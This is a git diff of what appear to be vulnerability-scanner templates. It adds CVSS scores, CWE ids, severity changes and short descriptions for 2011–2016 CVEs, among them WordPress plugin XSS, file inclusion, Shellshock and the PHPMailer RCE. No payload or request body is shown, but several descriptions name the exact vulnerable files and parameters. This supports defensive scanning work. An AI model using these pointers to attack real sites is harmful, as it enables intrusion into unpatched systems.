diff --git a/cves/2011/CVE-2011-4336.yaml b/cves/2011/CVE-2011-4336.yaml index 05714d8b90..1fe124e5d4 100644 --- a/cves/2011/CVE-2011-4336.yaml +++ b/cves/2011/CVE-2011-4336.yaml @@ -10,6 +10,11 @@ info: - https://www.securityfocus.com/bid/48806/info - https://seclists.org/bugtraq/2011/Nov/140 tags: cve,cve2011,xss,tikiwiki + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2011-4336 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2012/CVE-2012-4242.yaml b/cves/2012/CVE-2012-4242.yaml index d7ca7ac309..ed80489fb4 100644 --- a/cves/2012/CVE-2012-4242.yaml +++ b/cves/2012/CVE-2012-4242.yaml @@ -6,6 +6,7 @@ info: severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4242 tags: cve,cve2012,wordpress,xss,wp-plugin + description: "Cross-site scripting (XSS) vulnerability in the MF Gig Calendar plugin 0.9.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the query string to the calendar page." requests: - method: GET diff --git a/cves/2013/CVE-2013-2287.yaml b/cves/2013/CVE-2013-2287.yaml index 05ae7013e2..4b827a6e88 100644 --- a/cves/2013/CVE-2013-2287.yaml +++ b/cves/2013/CVE-2013-2287.yaml @@ -6,6 +6,7 @@ info: severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2013-2287 tags: cve,cve2013,wordpress,xss,wp-plugin + description: "Multiple cross-site scripting (XSS) vulnerabilities in views/notify.php in the Uploader plugin 1.0.4 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) notify or (2) blog parameter." requests: - method: GET diff --git a/cves/2013/CVE-2013-3526.yaml b/cves/2013/CVE-2013-3526.yaml index b081219b53..a65162e1be 100644 --- a/cves/2013/CVE-2013-3526.yaml +++ b/cves/2013/CVE-2013-3526.yaml 
@@ -6,6 +6,7 @@ info: severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2013-3526 tags: cve,cve2013,wordpress,xss,wp-plugin + description: "Cross-site scripting (XSS) vulnerability in js/ta_loaded.js.php in the Traffic Analyzer plugin, possibly 3.3.2 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the aoid parameter." requests: - method: GET diff --git a/cves/2014/CVE-2014-2323.yaml b/cves/2014/CVE-2014-2323.yaml index e4dff03126..61d21ce54c 100644 --- a/cves/2014/CVE-2014-2323.yaml +++ b/cves/2014/CVE-2014-2323.yaml @@ -7,6 +7,11 @@ info: author: geeknik severity: critical tags: cve,cve2014,sqli,lighttpd + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2014-2323 + cwe-id: CWE-89 requests: - raw: diff --git a/cves/2014/CVE-2014-3744.yaml b/cves/2014/CVE-2014-3744.yaml index d25a27bc60..b593394d70 100644 --- a/cves/2014/CVE-2014-3744.yaml +++ b/cves/2014/CVE-2014-3744.yaml @@ -9,6 +9,11 @@ info: - https://snyk.io/vuln/npm:st:20140206 severity: high tags: cve,cve2014,lfi,nodejs,st + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2014-3744 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2014/CVE-2014-4210.yaml b/cves/2014/CVE-2014-4210.yaml index cc9b0f8793..42932519fa 100644 --- a/cves/2014/CVE-2014-4210.yaml +++ b/cves/2014/CVE-2014-4210.yaml @@ -8,6 +8,7 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2014-4210 - https://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html + description: "Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.0.2.0 and 10.3.6.0 allows remote attackers to affect confidentiality via vectors related to WLS - Web Services." requests: - method: GET 
diff --git a/cves/2014/CVE-2014-4535.yaml b/cves/2014/CVE-2014-4535.yaml index 95bd42d005..8e6d8424d8 100644 --- a/cves/2014/CVE-2014-4535.yaml +++ b/cves/2014/CVE-2014-4535.yaml @@ -8,6 +8,12 @@ info: - https://wpscan.com/vulnerability/7fb78d3c-f784-4630-ad92-d33e5de814fd - https://nvd.nist.gov/vuln/detail/CVE-2014-4535 tags: cve,cve2014,wordpress,wp-plugin,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2014-4535 + cwe-id: CWE-79 + description: "Cross-site scripting (XSS) vulnerability in the Import Legacy Media plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php." requests: - method: GET diff --git a/cves/2014/CVE-2014-4536.yaml b/cves/2014/CVE-2014-4536.yaml index d1f974d279..d226a920db 100644 --- a/cves/2014/CVE-2014-4536.yaml +++ b/cves/2014/CVE-2014-4536.yaml @@ -8,6 +8,12 @@ info: - https://wpscan.com/vulnerability/f048b5cc-5379-4c19-9a43-cd8c49c8129f - https://nvd.nist.gov/vuln/detail/CVE-2014-4536 tags: cve,cve2014,wordpress,wp-plugin,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2014-4536 + cwe-id: CWE-79 + description: "Multiple cross-site scripting (XSS) vulnerabilities in tests/notAuto_test_ContactService_pauseCampaign.php in the Infusionsoft Gravity Forms plugin before 1.5.6 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) go, (2) contactId, or (3) campaignId parameter." requests: - method: GET diff --git a/cves/2014/CVE-2014-6271.yaml b/cves/2014/CVE-2014-6271.yaml index 07e8d11779..6c5db06412 100644 --- a/cves/2014/CVE-2014-6271.yaml +++ b/cves/2014/CVE-2014-6271.yaml 
@@ -3,13 +3,18 @@ id: CVE-2014-6271 info: name: Shellshock author: pentest_swissky - severity: high + severity: critical description: Attempts to exploit the "shellshock" vulnerability (CVE-2014-6271 and CVE-2014-7169) in web applications reference: - http://www.kb.cert.org/vuls/id/252743 - http://www.us-cert.gov/ncas/alerts/TA14-268A tags: cve,cve2014,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2014-6271 + cwe-id: CWE-78 requests: - method: GET path: diff --git a/cves/2014/CVE-2014-6308.yaml b/cves/2014/CVE-2014-6308.yaml index bc9fe62650..7b52384af9 100644 --- a/cves/2014/CVE-2014-6308.yaml +++ b/cves/2014/CVE-2014-6308.yaml @@ -6,6 +6,7 @@ info: severity: high reference: https://packetstormsecurity.com/files/128285/OsClass-3.4.1-Local-File-Inclusion.html tags: cve,cve2014,lfi + description: "Directory traversal vulnerability in OSClass before 3.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter in a render action to oc-admin/index.php." requests: - method: GET diff --git a/cves/2014/CVE-2014-9094.yaml b/cves/2014/CVE-2014-9094.yaml index 81ae8ce817..12b29d2090 100644 --- a/cves/2014/CVE-2014-9094.yaml +++ b/cves/2014/CVE-2014-9094.yaml @@ -6,6 +6,7 @@ info: severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2014-9094 tags: cve,2014,wordpress,xss,wp-plugin + description: "Multiple cross-site scripting (XSS) vulnerabilities in deploy/designer/preview.php in the Digital Zoom Studio (DZS) Video Gallery plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) swfloc or (2) designrand parameter." requests: - method: GET diff --git a/cves/2015/CVE-2015-1000012.yaml b/cves/2015/CVE-2015-1000012.yaml index b9a13af787..75c35ff769 100644 --- a/cves/2015/CVE-2015-1000012.yaml +++ b/cves/2015/CVE-2015-1000012.yaml 
@@ -8,6 +8,12 @@ info: - https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012 tags: cve,cve2015,wordpress,wp-plugin,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2015-1000012 + cwe-id: CWE-200 + description: "Local File Inclusion Vulnerability in mypixs v0.3 wordpress plugin" requests: - method: GET diff --git a/cves/2015/CVE-2015-2080.yaml b/cves/2015/CVE-2015-2080.yaml index f70ef7d40a..67ed7522de 100644 --- a/cves/2015/CVE-2015-2080.yaml +++ b/cves/2015/CVE-2015-2080.yaml @@ -3,7 +3,7 @@ id: CVE-2015-2080 info: name: Eclipse Jetty Remote Leakage author: pikpikcu - severity: medium + severity: high reference: - https://github.com/eclipse/jetty.project/blob/jetty-9.2.x/advisories/2015-02-24-httpparser-error-buffer-bleed.md - https://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html @@ -11,6 +11,11 @@ info: description: | The exception handling code in Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header, aka JetLeak tags: cve,cve2015,jetty + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2015-2080 + cwe-id: CWE-200 requests: - method: POST diff --git a/cves/2015/CVE-2015-2807.yaml b/cves/2015/CVE-2015-2807.yaml index ddb93e60fb..b39565c245 100644 --- a/cves/2015/CVE-2015-2807.yaml +++ b/cves/2015/CVE-2015-2807.yaml 
@@ -8,6 +8,7 @@ info: - https://advisories.dxw.com/advisories/publicly-exploitable-xss-in-wordpress-plugin-navis-documentcloud/ - https://nvd.nist.gov/vuln/detail/CVE-2015-2807 tags: cve,cve2015,wordpress,wp-plugin,xss + description: "Cross-site scripting (XSS) vulnerability in js/window.php in the Navis DocumentCloud plugin before 0.1.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the wpbase parameter." requests: - method: GET diff --git a/cves/2015/CVE-2015-6544.yaml b/cves/2015/CVE-2015-6544.yaml index 63d74145e0..23b0e18646 100644 --- a/cves/2015/CVE-2015-6544.yaml +++ b/cves/2015/CVE-2015-6544.yaml @@ -8,6 +8,11 @@ info: Cross-site scripting (XSS) vulnerability in application/dashboard.class.inc.php in Combodo iTop before 2.2.0-2459 allows remote attackers to inject arbitrary web script or HTML via a dashboard title. reference: https://nvd.nist.gov/vuln/detail/CVE-2015-6544 tags: cve,cve2015,xss,itop + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2015-6544 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2015/CVE-2015-8349.yaml b/cves/2015/CVE-2015-8349.yaml index cc437482ec..266da313a8 100644 --- a/cves/2015/CVE-2015-8349.yaml +++ b/cves/2015/CVE-2015-8349.yaml @@ -7,6 +7,11 @@ info: description: Cross-site scripting (XSS) vulnerability in SourceBans before 2.0 pre-alpha allows remote attackers to inject arbitrary web script or HTML via the advSearch parameter to index.php. reference: https://nvd.nist.gov/vuln/detail/CVE-2015-8349 tags: cve,cve2015,xss,sourcebans + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2015-8349 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2015/CVE-2015-8399.yaml b/cves/2015/CVE-2015-8399.yaml index dbe4e9c097..55ff02a7c7 100644 --- a/cves/2015/CVE-2015-8399.yaml +++ b/cves/2015/CVE-2015-8399.yaml 
@@ -6,6 +6,11 @@ info: description: Atlassian Confluence before 5.8.17 allows remote authenticated users to read configuration files via the decoratorName parameter to (1) spaces/viewdefaultdecorator.action or (2) admin/viewdefaultdecorator.action. reference: https://jira.atlassian.com/browse/CONFSERVER-39704?src=confmacro tags: cve,cve2015,atlassian,confluence + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.30 + cve-id: CVE-2015-8399 + cwe-id: CWE-200 requests: - method: GET diff --git a/cves/2015/CVE-2015-8813.yaml b/cves/2015/CVE-2015-8813.yaml index 35e2bc110b..d9b0c56e21 100644 --- a/cves/2015/CVE-2015-8813.yaml +++ b/cves/2015/CVE-2015-8813.yaml @@ -9,6 +9,11 @@ info: - https://blog.securelayer7.net/umbraco-the-open-source-asp-net-cms-multiple-vulnerabilities/ - https://nvd.nist.gov/vuln/detail/CVE-2015-8813 tags: cve,cve2015,ssrf,oob + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N + cvss-score: 8.20 + cve-id: CVE-2015-8813 + cwe-id: CWE-918 requests: - method: GET diff --git a/cves/2015/CVE-2015-9414.yaml b/cves/2015/CVE-2015-9414.yaml index d5c3fea0f8..d65a7b2262 100644 --- a/cves/2015/CVE-2015-9414.yaml +++ b/cves/2015/CVE-2015-9414.yaml @@ -8,6 +8,12 @@ info: - https://wpscan.com/vulnerability/2ac2d43f-bf3f-4831-9585-5c5484051095 - https://nvd.nist.gov/vuln/detail/CVE-2015-9414 tags: cve,cve2015,wordpress,wp-plugin,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2015-9414 + cwe-id: CWE-79 + description: "The wp-symposium plugin through 15.8.1 for WordPress has XSS via the wp-content/plugins/wp-symposium/get_album_item.php?size parameter." requests: - method: GET diff --git a/cves/2015/CVE-2015-9480.yaml b/cves/2015/CVE-2015-9480.yaml index bcd3d48d4d..aff9aca94d 100644 --- a/cves/2015/CVE-2015-9480.yaml +++ b/cves/2015/CVE-2015-9480.yaml 
@@ -8,6 +8,12 @@ info: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-9480 - https://www.exploit-db.com/exploits/37252 tags: cve,cve2015,wordpress,wp-plugin,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2015-9480 + cwe-id: CWE-22 + description: "The RobotCPA plugin 5 for WordPress has directory traversal via the f.php l parameter." requests: - method: GET diff --git a/cves/2016/CVE-2016-0957.yaml b/cves/2016/CVE-2016-0957.yaml index 676d804499..55a0fb1e4e 100644 --- a/cves/2016/CVE-2016-0957.yaml +++ b/cves/2016/CVE-2016-0957.yaml @@ -7,6 +7,10 @@ info: reference: https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html severity: high tags: cve,cve2016,adobe,aem + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2016-0957 requests: - method: GET diff --git a/cves/2016/CVE-2016-1000126.yaml b/cves/2016/CVE-2016-1000126.yaml index 0d3a928804..7570661517 100644 --- a/cves/2016/CVE-2016-1000126.yaml +++ b/cves/2016/CVE-2016-1000126.yaml @@ -6,6 +6,12 @@ info: severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000126 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000126 + cwe-id: CWE-79 + description: "Reflected XSS in wordpress plugin admin-font-editor v1.8" requests: - method: GET diff --git a/cves/2016/CVE-2016-1000127.yaml b/cves/2016/CVE-2016-1000127.yaml index 459e6c5829..51c400aa1e 100644 --- a/cves/2016/CVE-2016-1000127.yaml +++ b/cves/2016/CVE-2016-1000127.yaml 
@@ -7,6 +7,11 @@ info: description: Reflected XSS in wordpress plugin ajax-random-post v2.00 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000127 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000127 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2016/CVE-2016-1000128.yaml b/cves/2016/CVE-2016-1000128.yaml index b0abb144a2..9e8645e466 100644 --- a/cves/2016/CVE-2016-1000128.yaml +++ b/cves/2016/CVE-2016-1000128.yaml @@ -9,6 +9,11 @@ info: - http://www.vapidlabs.com/wp/wp_advisory.php?v=161 - https://wordpress.org/plugins/anti-plagiarism tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000128 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2016/CVE-2016-1000129.yaml b/cves/2016/CVE-2016-1000129.yaml index 9b0f14449b..fbeb35821b 100644 --- a/cves/2016/CVE-2016-1000129.yaml +++ b/cves/2016/CVE-2016-1000129.yaml @@ -7,6 +7,11 @@ info: description: Reflected XSS in wordpress plugin defa-online-image-protector v3.3 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000129 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000129 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2016/CVE-2016-1000130.yaml b/cves/2016/CVE-2016-1000130.yaml index 18141078b1..04c6324c51 100644 --- a/cves/2016/CVE-2016-1000130.yaml +++ b/cves/2016/CVE-2016-1000130.yaml @@ -7,6 +7,11 @@ info: description: Reflected XSS in wordpress plugin e-search v1.0 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000130 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000130 + cwe-id: CWE-79 requests: - method: GET 
diff --git a/cves/2016/CVE-2016-1000131.yaml b/cves/2016/CVE-2016-1000131.yaml index a9c8dcbf8d..f9e0d4a700 100644 --- a/cves/2016/CVE-2016-1000131.yaml +++ b/cves/2016/CVE-2016-1000131.yaml @@ -6,6 +6,12 @@ info: severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000131 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000131 + cwe-id: CWE-79 + description: "Reflected XSS in wordpress plugin e-search v1.0" requests: - method: GET diff --git a/cves/2016/CVE-2016-1000132.yaml b/cves/2016/CVE-2016-1000132.yaml index fa9404875a..c33a51fe7a 100644 --- a/cves/2016/CVE-2016-1000132.yaml +++ b/cves/2016/CVE-2016-1000132.yaml @@ -7,6 +7,11 @@ info: description: Reflected XSS in wordpress plugin enhanced-tooltipglossary v3.2.8 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000132 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000132 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2016/CVE-2016-1000133.yaml b/cves/2016/CVE-2016-1000133.yaml index 48e7531114..64968b022f 100644 --- a/cves/2016/CVE-2016-1000133.yaml +++ b/cves/2016/CVE-2016-1000133.yaml @@ -7,6 +7,11 @@ info: description: Reflected XSS in wordpress plugin forget-about-shortcode-buttons v1.1.1 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000133 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000133 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2016/CVE-2016-1000134.yaml b/cves/2016/CVE-2016-1000134.yaml index 99d42687c9..d11a917306 100644 --- a/cves/2016/CVE-2016-1000134.yaml +++ b/cves/2016/CVE-2016-1000134.yaml 
@@ -7,6 +7,11 @@ info: description: Reflected XSS in wordpress plugin hdw-tube v1.2 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000134 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000134 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2016/CVE-2016-1000135.yaml b/cves/2016/CVE-2016-1000135.yaml index 48480b29c5..5fbb768196 100644 --- a/cves/2016/CVE-2016-1000135.yaml +++ b/cves/2016/CVE-2016-1000135.yaml @@ -7,6 +7,11 @@ info: description: Reflected XSS in wordpress plugin hdw-tube v1.2 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000135 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000135 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2016/CVE-2016-1000137.yaml b/cves/2016/CVE-2016-1000137.yaml index 12a3ce8d62..eb4ae2195c 100644 --- a/cves/2016/CVE-2016-1000137.yaml +++ b/cves/2016/CVE-2016-1000137.yaml @@ -6,6 +6,12 @@ info: severity: medium reference: http://www.vapidlabs.com/wp/wp_advisory.php?v=658 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000137 + cwe-id: CWE-79 + description: "Reflected XSS in wordpress plugin hero-maps-pro v2.1.0" requests: - method: GET diff --git a/cves/2016/CVE-2016-1000138.yaml b/cves/2016/CVE-2016-1000138.yaml index b92f330cd6..ee73a4ce9f 100644 --- a/cves/2016/CVE-2016-1000138.yaml +++ b/cves/2016/CVE-2016-1000138.yaml 
@@ -6,6 +6,12 @@ info: severity: medium reference: http://www.vapidlabs.com/wp/wp_advisory.php?v=38 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000138 + cwe-id: CWE-79 + description: "Reflected XSS in wordpress plugin indexisto v1.0.5" requests: - method: GET diff --git a/cves/2016/CVE-2016-1000139.yaml b/cves/2016/CVE-2016-1000139.yaml index 05a6a6285a..b3ff2bbb88 100644 --- a/cves/2016/CVE-2016-1000139.yaml +++ b/cves/2016/CVE-2016-1000139.yaml @@ -8,6 +8,12 @@ info: - https://wpscan.com/vulnerability/0a60039b-a08a-4f51-a540-59f397dceb6a - https://nvd.nist.gov/vuln/detail/CVE-2016-1000139 tags: cve,cve2016,wordpress,wp-plugin,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000139 + cwe-id: CWE-79 + description: "Reflected XSS in wordpress plugin infusionsoft v1.5.11" requests: - method: GET diff --git a/cves/2016/CVE-2016-1000140.yaml b/cves/2016/CVE-2016-1000140.yaml index 8f25cbc37c..32a78c7534 100644 --- a/cves/2016/CVE-2016-1000140.yaml +++ b/cves/2016/CVE-2016-1000140.yaml @@ -6,6 +6,12 @@ info: severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000140 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000140 + cwe-id: CWE-79 + description: "Reflected XSS in wordpress plugin new-year-firework v1.1.9" requests: - method: GET diff --git a/cves/2016/CVE-2016-1000146.yaml b/cves/2016/CVE-2016-1000146.yaml index b45691d8da..4d9e921b14 100644 --- a/cves/2016/CVE-2016-1000146.yaml +++ b/cves/2016/CVE-2016-1000146.yaml 
@@ -6,6 +6,12 @@ info: severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000146 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000146 + cwe-id: CWE-79 + description: "Reflected XSS in wordpress plugin pondol-formmail v1.1" requests: - method: GET diff --git a/cves/2016/CVE-2016-1000148.yaml b/cves/2016/CVE-2016-1000148.yaml index fbb5d33d47..7340d0b0c2 100644 --- a/cves/2016/CVE-2016-1000148.yaml +++ b/cves/2016/CVE-2016-1000148.yaml @@ -8,6 +8,12 @@ info: - https://wpscan.com/vulnerability/ead796ed-202a-451f-b041-d39c9cf1fb54 - https://nvd.nist.gov/vuln/detail/CVE-2016-1000148 tags: cve,cve2016,wordpress,wp-plugin,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000148 + cwe-id: CWE-79 + description: "Reflected XSS in wordpress plugin s3-video v0.983" requests: - method: GET diff --git a/cves/2016/CVE-2016-1000149.yaml b/cves/2016/CVE-2016-1000149.yaml index b5e0487209..7998ec03d5 100644 --- a/cves/2016/CVE-2016-1000149.yaml +++ b/cves/2016/CVE-2016-1000149.yaml @@ -6,6 +6,12 @@ info: severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000149 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000149 + cwe-id: CWE-79 + description: "Reflected XSS in wordpress plugin simpel-reserveren v3.5.2" requests: - method: GET diff --git a/cves/2016/CVE-2016-1000152.yaml b/cves/2016/CVE-2016-1000152.yaml index 2dd82e5904..d44cabdaa9 100644 --- a/cves/2016/CVE-2016-1000152.yaml +++ b/cves/2016/CVE-2016-1000152.yaml 
@@ -7,6 +7,11 @@ info: description: Reflected XSS in wordpress plugin tidio-form v1.0 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000152 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000152 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2016/CVE-2016-1000153.yaml b/cves/2016/CVE-2016-1000153.yaml index e1ae1a74aa..8e9ef8b66c 100644 --- a/cves/2016/CVE-2016-1000153.yaml +++ b/cves/2016/CVE-2016-1000153.yaml @@ -6,6 +6,12 @@ info: severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000153 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000153 + cwe-id: CWE-79 + description: "Reflected XSS in wordpress plugin tidio-gallery v1.1" requests: - method: GET diff --git a/cves/2016/CVE-2016-1000154.yaml b/cves/2016/CVE-2016-1000154.yaml index c459fd33e9..dfbff06092 100644 --- a/cves/2016/CVE-2016-1000154.yaml +++ b/cves/2016/CVE-2016-1000154.yaml @@ -7,6 +7,11 @@ info: description: Reflected XSS in wordpress plugin whizz v1.0. reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000154 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000154 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2016/CVE-2016-1000155.yaml b/cves/2016/CVE-2016-1000155.yaml index 4772141fcf..70f109f44c 100644 --- a/cves/2016/CVE-2016-1000155.yaml +++ b/cves/2016/CVE-2016-1000155.yaml 
@@ -6,6 +6,12 @@ info: severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000155 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000155 + cwe-id: CWE-79 + description: "Reflected XSS in wordpress plugin wpsolr-search-engine v7.6" requests: - method: GET diff --git a/cves/2016/CVE-2016-10033.yaml b/cves/2016/CVE-2016-10033.yaml index 479d0f70f3..ff51ed5643 100644 --- a/cves/2016/CVE-2016-10033.yaml +++ b/cves/2016/CVE-2016-10033.yaml @@ -2,10 +2,15 @@ id: CVE-2016-10033 info: name: Wordpress 4.6 Remote Code Execution author: princechaddha - severity: high + severity: critical description: The mailSend function in the isMail transport in PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \" (backslash double quote) in a crafted Sender property. reference: 